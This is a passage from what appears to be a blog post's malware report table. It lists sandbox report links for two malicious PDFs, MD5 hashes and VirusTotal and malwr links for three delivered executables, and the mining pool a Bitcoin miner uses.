PDF4 - <a href="http://jsunpack.jeek.org/?report=634bc48cd8bcd4472cbe7c1004fbd8ce5852b924" rel="nofollow" target="_blank">http://jsunpack.jeek.org/</a>
PDF5 - <a href="http://jsunpack.jeek.org/?report=d3bd05136115e5a4742e930fdc40b1dd48b96ef1" rel="nofollow" target="_blank">http://jsunpack.jeek.org/</a></pre>
</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Delivered malware:</td>
<td style="background-color: #b8cce4; color: black;"><pre>EXE1(MD5 0e9337ee028e3e4b0bffebd7d1e502d2)
<a href="https://malwr.com/analysis/ZjA5MzhjOTYzY2Y1NGZmODg0NmZmZDAyZjVlOTM4ODY/" rel="nofollow" target="_blank">https://malwr.com/</a>
<a href="https://www.virustotal.com/en/file/abc089964afdee144d9934f636b68275024c0876eaa0ba5c356d37ac921a49e9/analysis/" rel="nofollow" target="_blank">https://www.virustotal.com</a>
</pre>
<pre>EXE2(MD5 de660551fb0670c16ec5b344d63406dd)
<a href="https://malwr.com/analysis/ZDczNGRhMmFkZGE3NDg4MThmODhjMzUyNDJlMTY1ZjY/" rel="nofollow" target="_blank">https://malwr.com/</a>
<a href="https://www.virustotal.com/en/file/d9999e5121f45481e560babcb7b1a56c6b7213c61489a84f400ce9e9b3833fe5/analysis/" rel="nofollow" target="_blank">https://www.virustotal.com</a>
</pre>
<pre>EXE3(MD5 3256da849bc3c62a6a015cf077794df2)
<a href="https://malwr.com/analysis/Nzk3YWE1Y2YyYTI2NDc3N2E2NGEyNzU2YmU2OTI1ZDE/" rel="nofollow" target="_blank">https://malwr.com/</a>
<a href="https://www.virustotal.com/en/file/a02086ad41d191d7cede256022cbcf013c2a3ff2593d99b3a0e23a2c955513c9/analysis/" rel="nofollow" target="_blank">https://www.virustotal.com</a>
</pre>
</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Additional Information</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;"><br /></td>
<td style="background-color: #b8cce4; color: black;"><pre>BitCoin miner is configured to use
'eu-stratum.btcguild.com' mining pool.</pre>
</td>
</tr>
</tbody></table>
</div>
Unknownnoreply@blogger.com0